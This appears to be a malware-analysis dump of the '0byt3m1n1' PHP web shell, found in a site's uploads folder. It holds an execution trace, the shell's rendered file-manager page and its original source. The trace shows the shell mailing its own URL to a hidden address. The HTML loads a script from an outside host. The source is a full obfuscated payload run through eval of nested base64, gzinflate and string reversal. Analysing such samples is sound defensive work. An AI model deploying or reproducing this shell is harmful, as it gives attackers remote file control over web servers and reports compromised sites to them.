4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'x'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'r'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= '-'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'x'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'r'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= '-'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'x'
4 64 1 0.004308 465600
4 64 R '-rwxr-xr-x'
4 66 0 0.004322 465560 is_writable 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 69 1 '/var/www/html/uploads/prepend.php'
4 66 1 0.004338 465600
4 66 R FALSE
4 67 0 0.004351 465560 is_readable 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 69 1 '/var/www/html/uploads/prepend.php'
4 67 1 0.004367 465600
4 67 R TRUE
4 68 0 0.004380 465560 filemtime 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 70 1 '/var/www/html/uploads/prepend.php'
4 68 1 0.004394 465600
4 68 R 1676260505
4 69 0 0.004407 465496 date 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 70 2 'd-M-Y H:i' 1676260505
4 69 1 0.004439 465824
4 69 R '12-Feb-2023 22:55'
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 74 $tmp = 'localhost/uploads/0byt3m1n1.php\n'
4 70 0 0.004471 465560 base64_decode 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 74 1 'dm9zY29kZTc3N0BnbWFpbC5jb20='
4 70 1 0.004487 465648
4 70 R 'voscode777@gmail.com'
4 71 0 0.004502 465616 mail 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 74 3 'voscode777@gmail.com' 'root' 'localhost/uploads/0byt3m1n1.php\n'
4 71 1 0.005201 465712
4 71 R FALSE
3 14 1 0.005224 465560
2 6 1 0.005237 423920
0.005267 339872
TRACE END [2023-02-13 01:55:31.605444]
Generated HTML code
<html><head><script src="http://w0rms.com/kaydet.php"></script><link href="" rel="stylesheet" type="text/css"><title>0byt3m1n1</title>
<link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">
<style type="text/css">body{background: #263238;color:#eceff1;font-family:'Courier';margin:0;font-size: 14px;}h1{font-family:'VT323';font-weight:normal;font-size:60px;margin:0;}h1:hover{color:#ffee58;}select{background:#ef6c00;color:#eceff1;}a{color:#ef6c00;text-decoration:none;font-family:'Courier'}textarea{width:900px;height:250px;background:transparent;border:1px dashed #ef6c00;color:#ef6c00;padding:2px;}tr.first{border-bottom:1px dashed #ef6c00;}tr:hover{background: #7f2e00;}th{background: #ef6c00;padding:5px;}</style>
</head><body> <div style="color:#ef6c00;margin-top:0;"><h1><center>0byt3m1n1</center></h1></div><table width="100%" border="0" align="center" style="margin-top:-10px;"><tbody><tr><td><font style="font-size:13px;">Path: <a style="font-size:13px;" href="?path="></a>/<a style="font-size:13px;" href="?path=/var">var</a>/<a style="font-size:13px;" href="?path=/var/www">www</a>/<a style="font-size:13px;" href="?path=/var/www/html">html</a>/<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;">
<input type="submit" value="Upload"></form></td></tr><tr><td colspan="2"></td></tr><tr><td></td></tr></tbody></table><br><center></center><div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tbody><tr class="first">
<th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th>
<th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr><tr><td>[F] <a href="?filesrc=/var/www/html/0byt3m1n1.php&path=/var/www/html">0byt3m1n1.php</a></td><td><center>3.543 KB</center></td><td><center>-rw-rw-r--</center></td><td><center>12-Feb-2023 22:54</center></td><td><center><form method="POST" action="?option&path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="0byt3m1n1.php"><input type="hidden" name="path" value="/var/www/html/0byt3m1n1.php"><input type="submit" value="+"></form></center></td></tr><tr><td>[F] <a href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td><td><center>0 KB</center></td><td><center>-rw-r--r--</center></td><td><center>12-Feb-2023 22:54</center></td><td><center><form method="POST" action="?option&path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="beneri.se_malware_analysis"><input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis"><input type="submit" value="+"></form></center></td></tr></tbody></table></div><br><center>© 2017 - <a href="http://zerobyte.id/">ZeroByte.ID</a> Recoded from Kodong.</center><br></body></html>Original PHP code
<?php
$enc = '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';
eval(base64_decode(base64_decode('WlhaaGJDZ2lQejRpTG1kNmRXNWpiMjF3Y21WemN5aG5lblZ1WTI5dGNISmxjM01vWjNwcGJtWnNZWFJsS0dkNmFXNW1iR0YwWlNobmVtbHVabXhoZEdVb1ltRnpaVFkwWDJSbFkyOWtaU2h6ZEhKeVpYWW9KR1Z1WXlrcEtTa3BLU2twT3c9PQ=========')));exit;
?>